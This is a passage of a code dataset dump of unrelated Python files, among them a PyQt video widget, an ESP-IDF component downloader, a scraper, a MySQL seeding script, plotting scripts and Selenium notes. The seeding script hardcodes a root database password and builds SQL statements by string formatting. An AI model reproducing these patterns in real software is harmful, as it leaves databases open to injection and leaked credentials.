rider7_df[sel_category][index7] \\\n #+ rider8_df[sel_category][index8] \\\n #+ rider9_df[sel_category][index9]\n \n if selection_value <= best_combination['Value']:\n continue\n \n else:\n best_combination['Value'] = float(selection_value)\n best_combination['Combination'] = [\n rider1_df['Name'][index1],\n rider2_df['Name'][index2],\n rider3_df['Name'][index3],\n rider4_df['Name'][index4],\n rider5_df['Name'][index5],\n rider9_df['Name'][index9]\n #rider6_df['Name'][index6],\n #rider7_df['Name'][index7],\n #rider8_df['Name'][index8],\n #rider9_df['Name'][index9]\n ]\n best_combination['Cost'] = int(current_cost)\n \n #print('New best selection found:')\n 
#rint(best_combination['Combination'])\n \n \n\n\n# End\n\n\n\n\n\n\n\n\n","sub_path":"velogames_algorithms_short.py","file_name":"velogames_algorithms_short.py","file_ext":"py","file_size_in_byte":9066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"302851624","text":"from PyQt5.QtCore import *\r\nfrom PyQt5.QtGui import *\r\nfrom PyQt5.QtWidgets import *\r\nimport numpy as np\r\n\r\nclass VideoPlot(QLabel):\r\n \"\"\" Displays a video-frame as a QLabel\r\n Drawing is relaized such that the aspect-ratio is kept constant\r\n and the image fills up all the available space in the layout the VideoPlot is contained in\"\"\"\r\n def __init__(self, video, parent=None, centered = True):\r\n super(VideoPlot, self).__init__(parent)\r\n\r\n self.video = None\r\n\r\n #set background to black and border to 0\r\n self.setStyleSheet(\"background-color: rgb(0,0,0); margin:0px; border:0px solid rgb(0, 255, 0); \")\r\n\r\n self.setMinimumSize(320, 180)#Set minimum size\r\n self.setSizePolicy(QSizePolicy.Expanding,QSizePolicy.Expanding)# Set size policy to expanding\r\n self.setAlignment(Qt.AlignCenter)\r\n self.update()\r\n\r\n def set_video(video):\r\n self.video = video\r\n\r\n def resizeEvent(self, event):\r\n \"\"\" Rescales the Pixmap that contains the image when QLabel changes size\r\n Args:\r\n event: QEvent\r\n \"\"\"\r\n size = self.size()\r\n size = QSize(int(size.width()),int(size.height()))\r\n scaledPix = self.pixmap.scaled(size, Qt.KeepAspectRatio, transformMode = Qt.FastTransformation )\r\n self.setPixmap(scaledPix)\r\n\r\n def update(self, frame = None):\r\n \"\"\" Upates the pixmap when a new frame is to be displays. Triggers the Qt eventpipeline.\r\n \"\"\"\r\n\r\n if type(frame) == type(None):#Init blank frame if no video is set yet\r\n frame = np.ndarray((9,16,3), dtype = np.byte)\r\n frame.fill(100)\r\n\r\n height, width, channel = frame.shape\r\n bytesPerLine = 3 * width\r\n image = QImage(frame.data, width, height, bytesPerLine, QImage.Format_RGB888)\r\n self.pixmap = QPixmap(image)\r\n size = self.size()\r\n scaledPix = self.pixmap.scaled(size, Qt.KeepAspectRatio, transformMode = Qt.FastTransformation)\r\n self.setPixmap(scaledPix)\r\n\r\n #QCoreApplication.processEvents()\r\n","sub_path":"videoplot.py","file_name":"videoplot.py","file_ext":"py","file_size_in_byte":2087,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"170951160","text":"\"\"\"Component source that downloads components from web service\"\"\"\n\nimport os\nimport re\nimport shutil\nimport tempfile\nfrom hashlib import sha256\nfrom io import open\n\nimport requests\n\nimport idf_component_tools.api_client as api_client\n\nfrom ..archive_tools import ArchiveError, get_format_from_path, unpack_archive\nfrom ..errors import FetchingError\nfrom .base import BaseSource\n\ntry:\n from urllib.parse import urlparse # type: ignore\nexcept ImportError:\n from urlparse import urlparse # type: ignore\n\ntry:\n from typing import Dict\nexcept ImportError:\n pass\n\n\ndef default_component_service_url():\n print('GOT HERE')\n return os.getenv('DEFAULT_COMPONENT_SERVICE_URL') or 'https://api.components.espressif.com/'\n\n\nDEFAULT_NAMESPACE = 'espressif'\n\n\nclass WebServiceSource(BaseSource):\n NAME = 'service'\n\n def __init__(self, source_details=None):\n super(WebServiceSource, self).__init__(source_details=source_details)\n self.base_url = str(self.source_details.get('service_url', default_component_service_url()))\n 
self.api_client = self.source_details.get(\n            'api_client', api_client.APIClient(base_url=self.base_url, source=self))\n\n    @classmethod\n    def required_keys(cls):\n        return ['service_url']\n\n    @property\n    def hash_key(self):\n        if self._hash_key is None:\n            url = urlparse(self.base_url)\n            netloc = url.netloc\n            path = '/'.join(filter(None, url.path.split('/')))\n            normalized_path = '/'.join([netloc, path])\n            self._hash_key = sha256(normalized_path.encode('utf-8')).hexdigest()\n        return self._hash_key\n\n    @staticmethod\n    def is_me(name, details):\n        # This should be run last\n        return True\n\n    def versions(self, name, details=None, spec='*'):\n        cmp_with_versions = self.api_client.versions(name, spec)\n\n        if not cmp_with_versions:\n            raise FetchingError('Cannot get versions of \"%s\"' % name)\n\n        return cmp_with_versions\n\n    def unique_path(self, name, version): # type: (str, str) -> str\n        \"\"\"Unique identifier for cache\"\"\"\n        return '~'.join([name.replace('/', '~~'), str(version), self.hash_key])\n\n    @property\n    def component_hash_required(self): # type: () -> bool\n        return True\n\n    @property\n    def downloadable(self): # type: () -> bool\n        return True\n\n    def normalized_name(self, name):\n        if '/' not in name:\n            name = '/'.join([DEFAULT_NAMESPACE, name])\n\n        return name\n\n    def download(self, component, download_path):\n        # Check for required components\n\n        if not component.component_hash:\n            raise FetchingError('Component hash is required for components from web service')\n\n        if not component.version:\n            raise FetchingError('Version should be provided for %s' % component.name)\n\n        component = self.api_client.component(component.name, component.version)\n        url = component.download_url\n\n        if not url:\n            raise FetchingError(\n                'Unexpected response: URL wasn\\'t found for version %s of \"%s\"',\n                component.version,\n                component.name,\n            )\n\n        with requests.get(url, stream=True, allow_redirects=True) as r:\n\n            # Trying to get extension from url\n            original_filename = url.split('/')[-1]\n\n            try:\n                extension = get_format_from_path(original_filename)[1]\n            except ArchiveError:\n                extension = None\n\n            if r.status_code != 200:\n                raise FetchingError(\n                    'Cannot download component %s@%s. 
Server returned HTTP code %s' %\n (component.name, component.version, r.status_code))\n\n # If didn't find anything useful, trying content disposition\n content_disposition = r.headers.get('content-disposition')\n if not extension and content_disposition:\n filenames = re.findall('filename=(.+)', content_disposition)\n try:\n extension = get_format_from_path(filenames[0])[1]\n except IndexError:\n raise FetchingError('Web Service returned invalid download url')\n\n tempdir = tempfile.mkdtemp()\n\n try:\n unique_path = self.unique_path(component.name, component.version)\n filename = '%s.%s' % (unique_path, extension)\n file_path = os.path.join(tempdir, filename)\n\n with open(file_path, 'wb') as f:\n for chunk in r.iter_content(chunk_size=65536):\n if chunk:\n f.write(chunk)\n\n unpack_archive(file_path, download_path)\n finally:\n shutil.rmtree(tempdir)\n\n return [download_path]\n\n @property\n def service_url(self):\n return self.base_url\n\n def serialize(self): # type: () -> Dict\n return {\n 'service_url': self.base_url,\n 'type': self.name,\n }\n","sub_path":"upload_components/component-manager/idf_component_tools/sources/web_service.py","file_name":"web_service.py","file_ext":"py","file_size_in_byte":5061,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"507539629","text":"__author__ = 'yinyan'\n\"\"\"\nQuestion Description:\nGiven a binary tree, find the lowest common ancestor (LCA) of two given nodes in the tree.\n\"\"\"\n#************************************Using a recursion****************************************************\n#\n#\n#\n#Time Complexity O()\n#Space Complexity O()\n##################################Using ###########################################################################\n#\n#\n#\n#\n#\n#Time Complexity O()\n#Space Complexity O()\n\"\"\"$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$Pitfall and Failures$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$\"\"\"\n#\n#\n#\n#\n############################################################################################################\nclass TreeNode(object):\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\nclass Solution(object):\n def lowestCommonAncestor(self, root, p, q):\n \"\"\"\n :type root: TreeNode\n :type p: TreeNode\n :type q: TreeNode\n :rtype: TreeNode\n \"\"\"\n if not root: return None\n if p==root or q==root: return root\n left, right=(self.lowestCommonAncestor(kid, p, q) for kid in (root.left, root.right))\n return root if left and right else left or right\n\n\n","sub_path":"LowestCommonAncestorOfABinaryTree_236.py","file_name":"LowestCommonAncestorOfABinaryTree_236.py","file_ext":"py","file_size_in_byte":1259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"512765144","text":"from urllib.request import urlopen\n\nfrom bs4 import BeautifulSoup\nfrom googletrans import Translator\n\ndef get_todays_meals():\n # fetch beautiful soup\n meals_html = urlopen('http://dorm.knu.ac.kr/_new_ver/')\n bs = BeautifulSoup(meals_html.read(), 'html.parser')\n\n # find text of meals\n menu_div = bs.find(\"div\", {\"class\": \"today_menu\"})\n all_meals = menu_div.findAll('p')\n\n # translate all meals and create list that stores them\n translator = Translator()\n meals_list = []\n for meal in all_meals:\n meals_list.append(translator.translate(meal.string).text)\n\n return 
meals_list","sub_path":"cafeteria/meals_fetching.py","file_name":"meals_fetching.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"191338464","text":"import pymysql\r\nimport json\r\nimport random\r\nimport time\r\n\r\n# 前提要求\r\n# 使用MySQL数据库\r\n# 默认端口打开\r\n# 在下方填写正确的参数\r\n\r\n# 本地127.0.0.1地址\r\nip = 'localhost'\r\n# 尽量使用root用户创建\r\nusername = 'root'\r\n# 对应的密码\r\npassword = '2104898'\r\n# 有一个专门的数据库\r\ndbname = 'edu'\r\n# json文件所在路径\r\nurl_classFile = './json/class.json'\r\nurl_userFile = './json/user.json'\r\nurl_authorFile = './json/author.json'\r\nurl_video = './json/video.json'\r\nurl_comment = './json/comment.json'\r\nurl_sub_video = './json/sub_video.json'\r\n\r\n# 连接数据库\r\ndb = pymysql.connect(ip,username,password,dbname)\r\ncursor = db.cursor()\r\n\r\n# 填充【class】表\r\nwith open(url_classFile, 'r',encoding='utf-8') as file :\r\n data_class = json.load(file)\r\n\r\n cursor.execute('TRUNCATE TABLE class')\r\n\r\n try:\r\n for item in data_class:\r\n sql = \"INSERT INTO class (root,sub) VALUES ('%s','%s');\" % (item['root'], item['sub'])\r\n cursor.execute(sql)\r\n\r\n db.commit()\r\n print('【通知】class表写入完成')\r\n except:\r\n db.rollback()\r\n print(\"【错误】class表写入出错\")\r\n\r\n# 填充【user】表\r\nwith open(url_userFile, 'r',encoding='utf-8') as file :\r\n data_user = json.load(file)\r\n\r\n cursor.execute('TRUNCATE TABLE user')\r\n\r\n try:\r\n for item in data_user:\r\n sql = \"\"\"\r\n INSERT INTO user (user_id,user_email,user_pass,user_name,favor_class,favor_author,collect_video,head_image,sex,author_id,user_info)\r\n VALUES (%s,'%s','%s','%s','%s','%s','%s','%s','%s',%s,'%s')\r\n \"\"\" % (\r\n item['user_id'], item['user_email'], item['user_pass'], item['user_name'], item['favor_class'],\r\n item['favor_author'], item['collect_video'], item['head_image'], item['sex'], item['author_id'],\r\n item['user_info'])\r\n cursor.execute(sql)\r\n\r\n db.commit()\r\n print('【通知】user表写入完成')\r\n except:\r\n db.rollback()\r\n print(\"【错误】user表写入出错\")\r\n\r\n# 填充【author】表\r\nwith open(url_authorFile, 'r',encoding='utf-8') as file :\r\n data_author = json.load(file)\r\n\r\n cursor.execute('TRUNCATE TABLE author')\r\n\r\n try:\r\n for item in data_author:\r\n sql = \"\"\"\r\n INSERT INTO author (author_id,user_id,fans,upload_video)\r\n VALUES (%s,%s,%s,'%s')\r\n \"\"\" % (item['author_id'],item['user_id'],item['fans'],item['upload_video'])\r\n cursor.execute(sql)\r\n\r\n db.commit()\r\n print('【通知】author表写入完成')\r\n except:\r\n db.rollback()\r\n print(\"【错误】author表写入出错\")\r\n\r\n# 填充【video】表\r\nwith open(url_video, 'r',encoding='utf-8') as file :\r\n data_video = json.load(file)\r\n\r\n cursor.execute('TRUNCATE TABLE video')\r\n\r\n video_ids = list(range((data_video['video_id'])['start'],(data_video['video_id'])['end']+1))\r\n video_names = data_video['video_name']\r\n video_urls = list(range((data_video['video_url'])['start'],(data_video['video_url'])['end']+1))\r\n video_logos = list(range((data_video['video_logo'])['start'],(data_video['video_logo'])['end']+1))\r\n description = data_video['description']\r\n author_ids = data_video['author_id']\r\n upload_dates = []\r\n\r\n temp_start = time.mktime(tuple(data_video['upload_date']['start']))\r\n temp_end = time.mktime(tuple(data_video['upload_date']['end']))\r\n for i in range(10):\r\n t = random.randint(temp_start, temp_end)\r\n date_touple = time.localtime(t)\r\n date = time.strftime(\"%Y-%m-%d %H:%M:%S\", date_touple)\r\n date = str(date)\r\n 
upload_dates.append(date)\r\n\r\n try:\r\n for video_id in video_ids:\r\n video_name = video_names[random.randint(0,len(video_names)-1)]\r\n video_url = \"/res/movie/\"+str(video_urls[random.randint(0,len(video_urls)-1)])+\".mp4\"\r\n video_logo = \"/res/logo/\"+str(video_logos[random.randint(0,len(video_logos)-1)])+\".jpg\"\r\n num_watch = random.randint(10,20)\r\n num_like = random.randint(0,num_watch)\r\n num_unlike = random.randint(0,num_like)\r\n author_id = author_ids[random.randint(0,len(author_ids)-1)]\r\n upload_date = upload_dates[random.randint(0,len(upload_dates)-1)]\r\n random_class = data_class[random.randint(0,len(data_class)-1)]\r\n root = random_class['root']\r\n sub = random_class['sub']\r\n\r\n sql = \"\"\"\r\n INSERT INTO video (video_id,video_name,video_url,video_logo,num_watch,num_like,num_unlike,description,author_id,upload_date,root,sub)\r\n VALUES (%d,'%s','%s','%s',%d,%d,%d,'%s',%d,'%s','%s','%s')\r\n \"\"\" % (video_id,video_name,video_url,video_logo,num_watch,num_like,num_unlike,description,author_id,upload_date,root,sub)\r\n\r\n cursor.execute(sql)\r\n\r\n sql = \"\"\"\r\n UPDATE author SET upload_video = CONCAT(upload_video,'-','%d') WHERE author_id = %d ;\r\n \"\"\" % (video_id,author_id)\r\n\r\n cursor.execute(sql)\r\n\r\n db.commit()\r\n print('【通知】video表写入完成')\r\n except:\r\n db.rollback()\r\n print(\"【错误】video表写入出错\")\r\n\r\n# 填充【comment】表\r\nwith open(url_comment, 'r',encoding='utf-8') as file :\r\n data_comment = json.load(file)\r\n\r\n cursor.execute('TRUNCATE TABLE comment')\r\n\r\n comment_num = data_comment['num']\r\n contents = data_comment['content']\r\n replys = data_comment['reply']['content']\r\n reply_num = data_comment['reply']['num']\r\n\r\n comment_dates = []\r\n temp_start = time.mktime(tuple(data_comment['date']['start']))\r\n temp_end = time.mktime(tuple(data_comment['date']['end']))\r\n for i in range(10):\r\n t = random.randint(temp_start, temp_end)\r\n date_touple = time.localtime(t)\r\n date = time.strftime(\"%Y-%m-%d %H:%M:%S\", date_touple)\r\n date = str(date)\r\n comment_dates.append(date)\r\n\r\n try:\r\n for video_id in video_ids:\r\n for temp_i in range(random.randint(0,comment_num)):\r\n comment_date = comment_dates[random.randint(0,len(comment_dates)-1)]\r\n user_id = int(data_user[random.randint(0,len(data_user)-1)]['user_id'])\r\n content = contents[random.randint(0,len(contents)-1)]\r\n num_like = random.randint(0,15)\r\n reply = ''\r\n\r\n for temp_j in range(random.randint(0,reply_num)):\r\n reply+=(data_user[random.randint(0,len(data_user)-1)]['user_id']+\":::\"+replys[random.randint(0,len(replys)-1)]+\":=:\")\r\n\r\n if reply!='':\r\n reply = reply[:-3]\r\n\r\n sql = \"\"\"\r\n INSERT INTO comment (video_id,date,user_id,content,num_like,reply)\r\n VALUES (%d,'%s',%d,'%s',%d,'%s')\r\n \"\"\" % (video_id,comment_date,user_id,content,num_like,reply)\r\n cursor.execute(sql)\r\n\r\n db.commit()\r\n print('【通知】comment表写入完成')\r\n except:\r\n db.rollback()\r\n print(\"【错误】comment表写入出错\")\r\n\r\n# 填充【sub_video】表\r\nwith open(url_sub_video, 'r',encoding='utf-8') as file :\r\n date_sub_video = json.load(file)\r\n\r\n cursor.execute('TRUNCATE TABLE sub_video')\r\n\r\n sub_video_num_start = date_sub_video['num']['start']\r\n sub_video_num_end = date_sub_video['num']['end']\r\n video_id = date_sub_video['video_id_start']\r\n names = date_sub_video['name']\r\n sub_url = date_sub_video['url']\r\n images_start = date_sub_video['image']['start']\r\n images_end = date_sub_video['image']['end']\r\n\r\n progresses = []\r\n for pro_i in 
range(5, 105, 10):\r\n progresses.append(float(pro_i)/100.0)\r\n\r\n try:\r\n for root_video_id in video_ids:\r\n for progress in progresses:\r\n for temp_i in range(random.randint(sub_video_num_start,sub_video_num_end)):\r\n name = names[random.randint(0, len(names) - 1)]\r\n image = \"/res/sub_logo/\"+str(random.randint(images_start,images_end))+\".jpg\"\r\n sub_video_like = random.randint(0,15)\r\n\r\n sql = \"\"\"\r\n INSERT INTO sub_video (root_video_id,progress,video_id,name,image,url,`like`)\r\n VALUES (%d,%f,%d,'%s','%s','%s',%d)\r\n \"\"\" % (root_video_id,progress,video_id,name,image,sub_url,sub_video_like)\r\n cursor.execute(sql)\r\n video_id+=1\r\n\r\n db.commit()\r\n print('【通知】sub_video表写入完成')\r\n except BaseException as e:\r\n db.rollback()\r\n print(\"【错误】sub_video表写入出错\")\r\n print(e)\r\n\r\n\r\n\r\n\r\ndb.close()","sub_path":"Init_Script/Create_DBTable.py","file_name":"Create_DBTable.py","file_ext":"py","file_size_in_byte":8998,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"64788901","text":"import csv\n\nfrom matplotlib import pyplot as plt\nfrom datetime import datetime as dt\n\nsitka_filename = 'Data visualization\\\\Chapter 2\\\\data\\\\sitka_weather_2018_simple.csv'\ndeath_valley_filename = 'Data visualization\\\\Chapter 2\\\\data\\\\death_valley_2018_simple.csv'\n\n# Sitka data\nwith open(sitka_filename) as f:\n csv_data_sitka = csv.reader(f)\n sitka_header_data = next(csv_data_sitka)\n\n for i, data in enumerate(sitka_header_data):\n if data == 'DATE':\n s_date_index = i\n if data == 'TMAX':\n s_tmax_index = i\n if data == 'TMIN':\n s_tmin_index = i \n\n # Data lists for sitka s_\n s_dates = []\n s_highs = []\n s_lows = []\n\n # Data gathering loop\n for row in csv_data_sitka:\n date = dt.strptime(row[s_date_index], '%Y-%m-%d')\n try:\n high_t = int(row[s_tmax_index])\n low_t = int(row[s_tmin_index])\n except ValueError:\n print(f'Missing Value for {date}!')\n else:\n s_dates.append(date)\n s_highs.append(high_t)\n s_lows.append(low_t)\n\n# Death valley data\nwith open(death_valley_filename) as f:\n csv_data_death_valley = csv.reader(f)\n death_valley_header_data = next(csv_data_death_valley)\n\n for i, data in enumerate(death_valley_header_data):\n if data == 'DATE':\n dv_date_index = i\n elif data == 'TMAX':\n dv_tmax_index = i\n elif data == 'TMIN':\n dv_tmin_index = i\n\n # Data lists for death valley dv_\n dv_highs = []\n dv_lows = []\n dv_dates = []\n\n # Data loop\n for row in csv_data_death_valley:\n date = dt.strptime(row[dv_date_index], '%Y-%m-%d')\n try:\n high_t = int(row[dv_tmax_index])\n low_t = int(row[dv_tmin_index])\n except ValueError:\n print(f'Missing data for {date}.')\n else:\n dv_dates.append(date)\n dv_highs.append(high_t)\n dv_lows.append(low_t)\n\n# Visualization\n\nplt.style.use('seaborn-dark')\nfig, ax = plt.subplots(figsize=(15, 7), dpi=128)\n\n# Sitka plots\nax.plot(s_dates, s_highs, c='red', alpha=0.4, label='Sitka Highs')\nax.plot(s_dates, s_lows, c='blue', alpha=0.6 ,label='Sitka Lows')\nax.fill_between(s_dates, s_highs, s_lows, facecolor='orange', alpha=0.2)\n\n# Death Valley plots\nax.plot(dv_dates, dv_highs, c='red', alpha=0.6, label='Death Valley Highs')\nax.plot(dv_dates, dv_lows, c='blue', alpha=0.4, label='Death Valley Lows')\nax.fill_between(dv_dates, dv_highs, dv_lows, facecolor='purple', alpha=0.2)\n\n# Styling\nax.set_title('Comparison between Sitka and Death Valley by daily temperature, 2018', fontsize=22)\nax.set_xlabel('Dates', 
fontsize=14)\nax.set_ylabel('Temperature (F)', fontsize=14)\nax.tick_params(axis='both', which='major', labelsize=16)\nfig.autofmt_xdate()\n\nplt.legend()\nplt.show()\n\n# A lot of this code could be refactored into just 2 functions:\n# one for the csv extraction, returning the 3 lists,\n# and one for visualizing the data, returning 1 complete plot.\n","sub_path":"Data visualization/Chapter 2/sitka_death_valley_comaprison.py","file_name":"sitka_death_valley_comaprison.py","file_ext":"py","file_size_in_byte":3047,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"155864919","text":"# -*- coding:utf-8 -*-\n'''\n\nError shown when running:\nUserWarning: Selenium support for PhantomJS has been deprecated, please use headless versions of Chrome or Firefox instead\n  warnings.warn('Selenium support for PhantomJS has been deprecated, please use headless '\n\n\nRoughly: Selenium has dropped PhantomJS and recommends headless Firefox or Chrome instead.\n\nIf you want to silence the warning, you can downgrade Selenium.\n\n\nFinding page elements:\n\n    Return a single element:\n\n    find_element_by_id                  # locate by id\n    find_element_by_name                # locate by name\n    find_element_by_xpath               # locate by xpath\n\n    # (find an element by its link text)\n    find_element_by_link_text           # locate by link text\n\n    # (find an element by part of its link text)\n    find_element_by_partial_link_text   # locate by partial link text\n\n    find_element_by_tag_name            # locate by tag name\n    find_element_by_class_name          # locate by class name\n    find_element_by_css_selector        # locate by css selector\n\n\n    Plural forms:\n\n    find_elements_by_name\n    find_elements_by_xpath\n    find_elements_by_link_text\n    find_elements_by_partial_link_text\n    find_elements_by_tag_name\n    find_elements_by_class_name\n    find_elements_by_css_selector\n\n\n\n    These two generic forms are nearly forgotten:\n    find_element(self, by='id', value=None)\n    find_elements(self, by='id', value=None)\n\n\n    1. The element methods are singular and locate a single element directly\n\n    2. The elements methods are plural; they locate a group of elements and return a list\n\n\n\nElement operation methods:\n\n    clear        clear the element's content\n    send_keys    simulate typing into the element\n    click        click the element\n    submit       submit the form\n    quit         quit the browser\n\n\nCommonly read values:\n\n    size                 get the element's size\n    text                 get the element's text\n    get_attribute(name)  get an attribute's value\n    location             get the element's coordinates (locate the element first, then call this)\n    page_source          return the page source\n    driver.title         return the page title\n    current_url          get the current page URL\n    is_displayed()       whether the element is visible\n    is_enabled()         whether the element is enabled\n    is_selected()        whether the element is selected\n    tag_name             return the element's tagName\n\n'''\n\nfrom selenium import webdriver\n\nimport time\n\ndriver = webdriver.PhantomJS()\n\ndriver.get('http://www.baidu.com/')\n\nprint(driver.title)\n\nprint(driver.page_source)\n\nelement = driver.find_element_by_name('wd')\nelement.send_keys('phantomjs')\n\ndriver.save_screenshot('phantomjs.png')\n\ndriver.find_element_by_id(\"kw\").clear()\n\n\ndriver.find_element_by_id(\"kw\").send_keys(u'美女')\ndriver.find_element_by_id('su').click()\ndriver.save_screenshot('meinv.png')\n\n\nelement = driver.find_element_by_class_name(\"s_btn\")\n\nprint('sss')\n\ndriver.quit()\n\n'''\n
<select>\n    <option>Cheddar</option>\n    <option>Gouda</option>\n</select>\n
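\nA minimal sketch of driving a dropdown like the one above with Selenium's\nSelect helper (added here for illustration only; the original notes stop at\nthe HTML itself):\n\n    from selenium.webdriver.support.ui import Select\n\n    # Select wraps a <select> WebElement and exposes option-picking helpers\n    select = Select(driver.find_element_by_tag_name('select'))\n    select.select_by_visible_text('Gouda')  # picks the Gouda option\n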
\n'''\n","sub_path":"Exercise/Reptile/Selenium/0、Selenium 基本用法.py","file_name":"0、Selenium 基本用法.py","file_ext":"py","file_size_in_byte":2847,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"159728483","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom iabox import Interval, cadd, csqr, cmul, math\n\nR1 = R2 = Interval(0, math.inf)\nR = I2 = Interval(-math.inf, math.inf)\n\nE = Interval(23, 26)\nI = Interval(4, 8)\nU1 = Interval(10, 11)\nU2 = Interval(14, 17)\nP = Interval(124, 130)\n\nprint(f\"R1={R1}, R2={R2}, E={E}, I={I}, U1={U1}, U2={U2}\")\n\nfor k in range(10): # To be more accurate to the fixed point\n R, R1, R2 = cadd(R, R1, R2)\n P, E, I = cmul(P, E, I)\n E, R, I = cmul(E, R, I)\n U2, R2, I = cmul(U2, R2, I)\n U1, R1, I = cmul(U1, R1, I)\n E, U1, U2 = cadd(E, U1, U2)\n I2, I = csqr(I2, I)\n P, R, I2 = cmul(P, R, I2)\n\nprint(f\"R1={R1}, R2={R2}, E={E}, I={I}, U1={U1}, U2={U2}\")\n","sub_path":"iamooc/04_circuit.py","file_name":"04_circuit.py","file_ext":"py","file_size_in_byte":699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"611118332","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\ndef microcar(x,y):\n \n ex_hor_disp = np.array([])\n ex_vert_disp = np.array([])\n \n act_hor_disp = np.array([])\n act_vert_disp = np.array([])\n \n ex_dist = np.array([])\n act_dist = np.array([])\n \n \n for i in range(len(x)):\n \n #This is us defining our measurements of displacement and distance, we can do so globally(outside each for loop) because it's calculated for each file just once\n ex_distance = 0\n act_distance = 0\n \n with open(x[i],'r') as ex_inputfile:\n #This is us declaring and initalising variables in a local scope to reset for each car\n vert_displacement = 0\n hor_displacement = 0\n \n \n \n \n \n for line in ex_inputfile:\n instruction = line.split(',')\n instruction[2] = instruction[2].strip()\n \n \n \n \n #This is just looking at the instructed/expected displacement over time\n if instruction[0] == 'N':\n vert_displacement += (int(instruction[1])*int(instruction[2]))\n \n elif instruction[0] == 'S':\n vert_displacement -= (int(instruction[1])*int(instruction[2]))\n \n elif instruction[0] == 'E':\n hor_displacement += (int(instruction[1])*int(instruction[2]))\n \n else:\n hor_displacement -= (int(instruction[1])*int(instruction[2]))\n \n ex_distance += (int(instruction[1])*int(instruction[2]))\n \n vert_displacement = round(vert_displacement,2)\n hor_displacement = round(hor_displacement,2)\n ex_distance = round(ex_distance,2)\n \n \n #This is used to add the final expected displacements to the array\n ex_hor_disp = np.append(ex_hor_disp,hor_displacement)\n ex_vert_disp = np.append(ex_vert_disp,vert_displacement)\n \n #Likewise, this is used to add the final expected distance travelled to the array\n ex_dist = np.append(ex_dist,ex_distance)\n \n\n\n with open (y[i],'r') as act_inputfile:\n #This is again just us declaring and initalising variables on a local scale for each car\n vert_displacement = 0\n hor_displacement = 0\n \n for line in act_inputfile:\n action = line.split(',')\n action[2] = action[2].strip()\n \n \n \n #This is just looking at the actual displacement over time\n if action[0] == 'N':\n vert_displacement += (int(action[1])*int(action[2]))\n \n elif action[0] == 'S':\n vert_displacement -= (int(action[1])*int(action[2]))\n \n elif action[0] == 'E':\n hor_displacement += (int(action[1])*int(action[2]))\n \n else:\n 
hor_displacement -= (int(action[1])*int(action[2]))\n \n act_distance += (int(action[1])*int(action[2]))\n \n vert_displacement = round(vert_displacement,2)\n hor_displacement = round(hor_displacement,2)\n act_distance = round(act_distance,2)\n \n #This is used to add the final expected displacements to the array\n act_hor_disp = np.append(act_hor_disp,hor_displacement)\n act_vert_disp = np.append(act_vert_disp,vert_displacement)\n \n #Likewise, this is used to add the final expected distance travelled to the array\n act_dist = np.append(act_dist,act_distance)\n \n \n return ex_hor_disp, ex_vert_disp, act_hor_disp, act_vert_disp, ex_dist, act_dist\n\n\ndef plotmicrocar(x,y):\n \n \n #setting each array equal to the returned arrays from the microcar function\n ex_hor_disp, ex_vert_disp, act_hor_disp, act_vert_disp, ex_dist, act_dist = microcar(x,y)\n \n #And now, we start to plot\n \n #The reason we created the zero array is just so that if all the displacements are positive, we'll just have a minimum of 0\n zero_array = np.array([0])\n #One of the criteria is to adjust the axes such that the plots are square, so to do so,we'll find the minimum and maximum of the vertical and horizontal displacements\n min_vert = min(np.concatenate((ex_vert_disp,act_vert_disp,zero_array),axis = 0))\n max_vert = max(np.concatenate((ex_vert_disp,act_vert_disp,zero_array),axis = 0))\n \n min_hor = min(np.concatenate((ex_hor_disp,act_hor_disp,zero_array),axis = 0))\n max_hor = max(np.concatenate((ex_hor_disp,act_hor_disp,zero_array),axis = 0))\n \n min_all = min(min_vert,min_hor)\n max_all = max(max_vert,max_hor)\n print(min_all)\n print(max_all)\n \n #This is the top graph, showing expected vs actual distances covered by each car\n \n #This is just declaring that it's a subplot, but the problem is, how do we adjust the size of the top plot so it takes up the whole top row?\n \n #This problem is fixed by the fact that you don't have to have consistent row and column numbers for each subplot, just that the ordering makes sense.\n plt.subplot(2,1,1)\n \n \n '''Really, this whole part is just taken from an online source, at least the width adjustment part is'''\n #This is getting the x position of each bar, for the expected distances\n x1 = np.arange(len(ex_dist))\n \n #This is getting the x positions of each bar, for the actual distances\n x2 = [x + 0.2 for x in x1]\n \n #This is actually plotting each one now\n \n #Plot the expected distances for each car\n plt.bar(x1, ex_dist, width = 0.2, color = 'blue', label = 'Exp')\n \n #Plot the actual distances for each car\n plt.bar(x2, act_dist, width = 0.2, color = 'black', label = 'Act')\n \n #general layout\n plt.xlabel('mcar')\n plt.ylabel('Dist')\n \n #So usually the tick would appear in the middle of the left bar if we just had x1, but we want it in the middle, so we use x1+0.1, which is half the width of the bar.\n plt.xticks(x1 + 0.1, x1)\n plt.legend()\n plt.title(\"Distance\")\n \n plt.tight_layout()\n \n \n \n \n #This is the bottom left subplot\n miv_legend_array = []\n for i in range(len(ex_hor_disp)):\n miv_legend_array.append(\"mivcar \"+str(i))\n \n \n \n \n plt.subplot(2,2,3)\n plt.xlim(min_all-10,max_all+10)\n plt.ylim(min_all-10,max_all+10)\n for i in range(len(ex_hor_disp)):\n plt.scatter([ex_hor_disp[i]],[ex_vert_disp[i]], marker = 'o', c = np.random.rand(3,) )\n plt.xlabel('x Displacement')\n plt.ylabel('y Disp (m)')\n plt.title('E')\n plt.legend([x for x in miv_legend_array])\n \n #This is the bottom right subplot\n \n #This just generates the 
